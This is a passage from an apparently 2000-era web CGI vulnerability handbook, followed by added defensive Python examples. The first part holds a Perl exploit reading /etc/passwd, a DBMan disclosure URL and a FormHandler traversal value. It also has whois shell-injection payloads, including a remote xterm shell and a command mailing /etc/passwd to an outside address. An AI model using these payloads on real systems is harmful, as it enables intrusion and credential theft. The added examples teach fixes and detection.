my $FiletoGet="/etc/passwd";
# **************************************************

my $url="http://".$TargetHost.$TargetPath."/file=$SearchFile&hdr=$FiletoGet";

print("\nHtgrep Arbitrary File Reading Vulnerability EXPLOIT /n30\n\n");
print("URL: $url\n\n");

my $request = new HTTP::Request('GET', $url);
my $response = $ua->request($request);

if ($response->is_success) {
    print $response->content;
} else {
    print $response->error_as_HTML;
}
# Definitely NOT Hack.co.za

49. DBMan db.cgi sensitive information disclosure vulnerability

When a web server running the Gossamer Threads DBMan script is asked for a database file that does not exist, it returns an error page that dumps its environment variables. These include the web server's document root path, the administrator account name, the web server version, the platform and other sensitive details.

Attack: http://www.victim.com/scripts/dbman/db.cgi?db=blahblah

50. Security vulnerabilities in several whois CGI programs

The whois CGI programs in Whois Internic Lookup version 1.0, CC Whois version 1.0 and Matt's Whois version 1 do not filter shell metacharacters; the query is handed to the shell, so a query string of any of the following forms executes the embedded commands:

1) ;commands
2) ";commands
3) ;commands;

For example, entering one of these whois queries:

1) ;id
2) ";id
3) ;id;

produces output such as:

uid=501(blah) gid=500(blah)

Some other examples:

;xterm -display ip:0.0 -rv -e /bin/sh
";uname -a;whoami;w;ls -al
;cat /etc/passwd|mail you@yourdomain.com;

51. FormHandler.cgi reply attachment vulnerability

Any file that FormHandler.cgi (usually run as 'nobody' on Unix) can read can be attached to the reply e-mail. An attacker therefore only has to edit the form to receive sensitive files such as /etc/passwd.

Attack:

@ALLOWED_ATTACH_DIRS = ('all'); # hmm, nice defaults ;)
@RESTRICTED_ATTACH_DIRS = ('/etc/');
[...]
if (&valid_directory($filename)) { # let's check if file is allowed
    push(@files, $filename);
    [...]
} # to send
[...]
sub valid_directory {
    local ($filename) = $_[0];
    local ($allowed_path, $restricted_path);
    local($valid_dir) = 0;

    if ($ALLOWED_ATTACH_DIRS[0] =~ /^all$/i) { $valid_dir = 1 }
    else {
        foreach $allowed_path (@ALLOWED_ATTACH_DIRS) {
            $valid_dir = ($filename =~ /^$allowed_path/); # silly ...
            last if $valid_dir;
        }
    }
    foreach $restricted_path (@RESTRICTED_ATTACH_DIRS) {
        $valid_dir = ($filename !~ /^$restricted_path/); # once more
        last if !$valid_dir;
    }
    return $valid_dir;
}
[...]

How to download /etc/passwd? The restricted-directory test is a literal prefix match on the name as submitted: /tmp/../etc/passwd does not begin with /etc/, so it passes, yet it opens /etc/passwd. Just add this to the form:

VALUE="text:/tmp/../etc/passwd">

This article may be freely extended and redistributed. There are many, many more web application vulnerabilities; additions and corrections are welcome.

无用君 9/28/00
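Added worked example for section 42 (not from the original post or from the wwwthreads project): the sort_order trick replayed against a small in-memory SQLite table. The column names U_Status and U_Security are taken from the exploit above; the table layout, the UPDATE statement and the use of SQLite instead of wwwthreads' real database are assumptions made for this example.

```python
# Added example: the section 42 sort_order injection replayed against an
# in-memory SQLite table.  The table layout and the UPDATE statement are
# assumptions standing in for wwwthreads' changedisplay.pl; the column
# names U_Status and U_Security are taken from the exploit above.
import sqlite3

# The value the exploit sends in sort_order (after URL decoding).
PAYLOAD = "5,U_Status='Administrator',U_Security=100"


def fresh_db():
    """Constructed sample data: one ordinary user."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE Users (Username TEXT, U_Status TEXT,"
               " U_Security INTEGER, sort_order INTEGER)")
    db.execute("INSERT INTO Users VALUES ('rfp', 'User', 10, 0)")
    db.commit()
    return db


def change_display_vulnerable(db, username, sort_order):
    """String-built UPDATE: whatever is in sort_order becomes SQL text,
    so '5,U_Status=...' turns one SET clause into three."""
    sql = "UPDATE Users SET sort_order=%s WHERE Username='%s'" % (sort_order, username)
    db.execute(sql)
    db.commit()
    return sql


def change_display_safe(db, username, sort_order):
    """Type check plus bound parameters: the payload never reaches the SQL parser."""
    order = int(sort_order)          # ValueError on anything but an integer
    db.execute("UPDATE Users SET sort_order=? WHERE Username=?", (order, username))
    db.commit()


def status_of(db, username):
    """(U_Status, U_Security) for the user."""
    return db.execute("SELECT U_Status, U_Security FROM Users WHERE Username=?",
                      (username,)).fetchone()


def demo():
    """Returns (status after the vulnerable update, was the payload rejected,
    status after the safe update)."""
    vuln = fresh_db()
    change_display_vulnerable(vuln, "rfp", PAYLOAD)
    safe = fresh_db()
    try:
        change_display_safe(safe, "rfp", PAYLOAD)
        rejected = False
    except ValueError:
        rejected = True
    return status_of(vuln, "rfp"), rejected, status_of(safe, "rfp")


if __name__ == "__main__":
    print(demo())
```

Running demo() shows the account promoted to Administrator with U_Security 100 through the concatenated query, while the bound-parameter version refuses the value before it is ever sent to the database.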
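Added worked example for section 43 (not from the original post): why the %6Dsadc request gets past a filter that looks for the literal string /msadc/msadcs.dll, and a decode-then-match check that catches it, run over a few constructed Common Log Format lines. The log lines and client addresses are made up for this example.

```python
# Added example: why the %6Dsadc request from section 43 slips past a filter
# that matches the literal string "/msadc/msadcs.dll", and a decode-then-match
# check that catches it.  The log lines below are constructed for this example.
import posixpath
import re
from urllib.parse import unquote

BLOCKED = "/msadc/msadcs.dll"
REQ_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) HTTP/')

# Constructed log lines: a plain request, the encoded request from section 43,
# an innocent request, and a dot-segment variant.
LOG_LINES = [
    '10.0.0.5 - - [28/Sep/2000:10:01:02 +0800] "POST /msadc/msadcs.dll/AdvancedDataFactory.Query HTTP/1.1" 200 512',
    '10.0.0.5 - - [28/Sep/2000:10:01:03 +0800] "GET /%6Dsadc/%6Dsadcs.dll/V%62BusO%62j.V%62BusO%62jCls.GetRecordset HTTP/1.0" 200 1024',
    '10.0.0.7 - - [28/Sep/2000:10:02:00 +0800] "GET /index.html HTTP/1.0" 200 2048',
    '10.0.0.9 - - [28/Sep/2000:10:03:11 +0800] "GET /scripts/..%2F..%2FMSADC/msadcs.dll HTTP/1.0" 200 300',
]


def naive_match(path):
    """The kind of check the encoded request defeats: a literal substring test."""
    return BLOCKED in path.lower()


def normalize(path):
    """Percent-decode until the string stops changing (defeats double encoding
    such as %256D), drop any query string, collapse ./ and ../ segments,
    and lower-case for a case-insensitive filesystem."""
    prev = None
    while path != prev:
        prev, path = path, unquote(path)
    path = path.split("?", 1)[0]
    return posixpath.normpath(path).lower()


def normalized_match(path):
    return BLOCKED in normalize(path)


def flag_requests(lines, matcher):
    """Return (client, raw_path) for every request the matcher flags."""
    hits = []
    for line in lines:
        m = REQ_RE.match(line)
        if m and matcher(m.group(2)):
            hits.append((m.group(1), m.group(2)))
    return hits


if __name__ == "__main__":
    print("naive:     ", flag_requests(LOG_LINES, naive_match))
    print("normalized:", flag_requests(LOG_LINES, normalized_match))
```

The literal match sees only the first request; decoding and canonicalizing first also catches the %6D spelling and the ..%2F form. The same normalization step is what a server-side filter in front of msadcs.dll would need, since the handler itself decodes the path before dispatching.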
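Added worked example for sections 45, 48 and 51 (not from the original post or from any of the affected projects): the literal prefix check that FormHandler's valid_directory performs, the same rule applied to a canonicalized path, and a document-root-bound file fetch of the kind cached_feed.cgi and htgrep should have done. DOC_ROOT is an assumed value; RESTRICTED mirrors the @RESTRICTED_ATTACH_DIRS default shown in section 51.

```python
# Added example: literal prefix checks (sections 45, 48, 51) versus
# canonicalize-then-check.  DOC_ROOT is assumed; RESTRICTED mirrors the
# @RESTRICTED_ATTACH_DIRS default in section 51.  The checks are modelled on
# the valid_directory snippet, not copied from FormHandler.cgi.
import posixpath

DOC_ROOT = "/var/www/html"      # assumed document root
RESTRICTED = ("/etc/",)         # default from the section 51 snippet


def valid_directory_literal(filename):
    """FormHandler-style rule: restricted means the submitted name *starts
    with* the restricted prefix.  '/tmp/../etc/passwd' does not, so it passes."""
    return not any(filename.startswith(r) for r in RESTRICTED)


def canonical(path):
    """Lexical canonicalization: resolves '.' and '..' without touching the
    filesystem, so it also handles components like '.+' that need not exist."""
    return posixpath.normpath(path)


def valid_directory_fixed(filename):
    """The same rule applied to the canonical path."""
    canon = canonical(filename)
    return not any(canon.startswith(r) for r in RESTRICTED)


def resolve_under_root(requested, root=DOC_ROOT):
    """Safe version of the cached_feed.cgi / htgrep file fetch: join to the
    document root, canonicalize, and refuse anything that escapes it."""
    canon = canonical(posixpath.join(root, requested.lstrip("/")))
    if canon != root and not canon.startswith(root + "/"):
        raise PermissionError("path escapes document root: " + requested)
    return canon


def escapes_root(requested, root=DOC_ROOT):
    """True when resolve_under_root would refuse the request."""
    try:
        resolve_under_root(requested, root)
        return False
    except PermissionError:
        return True


if __name__ == "__main__":
    print("literal check lets /tmp/../etc/passwd through:",
          valid_directory_literal("/tmp/../etc/passwd"))
    print("fixed check lets it through:",
          valid_directory_fixed("/tmp/../etc/passwd"))
    print("cached_feed payload escapes root:",
          escapes_root("../../../.+/etc/passwd"))
```

normpath is purely lexical; on a live server the name should additionally be passed through os.path.realpath once it is known to exist, so that a symlink inside the document root cannot point back out of it.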
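Added worked example for section 50 (not from the original post or from any of the whois CGIs): the shell-metacharacter injection reproduced locally, beside an argv-based call that neutralizes it and an allow-list validator. It also covers the newline form (%0a after URL decoding) that the phf, campas and whois_raw.cgi entries in this handbook rely on. 'echo' stands in for the whois binary so the example runs offline; a POSIX sh and the id(1) command are assumed to be available.

```python
# Added example: shell metacharacter injection from section 50 (and the %0a
# newline trick used elsewhere in this handbook) reproduced locally, next to
# the argv-based call that neutralizes it.  'echo' stands in for whois so the
# example runs offline; a POSIX sh and id(1) are assumed to be present.
import re
import subprocess

# Constructed attacker inputs: the ';id' form from section 50 and a
# newline-separated command (what %0a becomes after URL decoding).
PAYLOADS = [";id", "x\nid"]

# Host names only: letters, digits, dots and hyphens, 253 characters at most.
HOST_RE = re.compile(r"[A-Za-z0-9][A-Za-z0-9.-]{0,252}")


def whois_vulnerable(query):
    """The CGI pattern behind section 50: interpolate the query into a shell line."""
    result = subprocess.run("echo whois " + query, shell=True,
                            capture_output=True, text=True)
    return result.stdout


def whois_argv(query):
    """No shell at all: the query is a single argv element, metacharacters and
    newlines included, and is never parsed as a command."""
    result = subprocess.run(["echo", "whois", query],
                            capture_output=True, text=True)
    return result.stdout


def validate_query(query):
    """Allow-list the input first; reject anything that is not a host name."""
    if not HOST_RE.fullmatch(query):
        raise ValueError("not a host name: %r" % query)
    return query


def is_rejected(query):
    try:
        validate_query(query)
        return False
    except ValueError:
        return True


def whois_safe(query):
    """Validate, then call without a shell."""
    return whois_argv(validate_query(query))


def ran_id(output):
    """Did id(1) actually execute?  Its output always starts with 'uid='."""
    return "uid=" in output


if __name__ == "__main__":
    for p in PAYLOADS:
        print(repr(p), "vulnerable ran id:", ran_id(whois_vulnerable(p)),
              "| argv ran id:", ran_id(whois_argv(p)),
              "| rejected:", is_rejected(p))
```

The shell form runs id for both payloads; the argv form prints the payload back as literal text, and the validator refuses both before any process is started. Doing both, validate and avoid the shell, is the right default, since an allow-list alone is only as good as the regular expression.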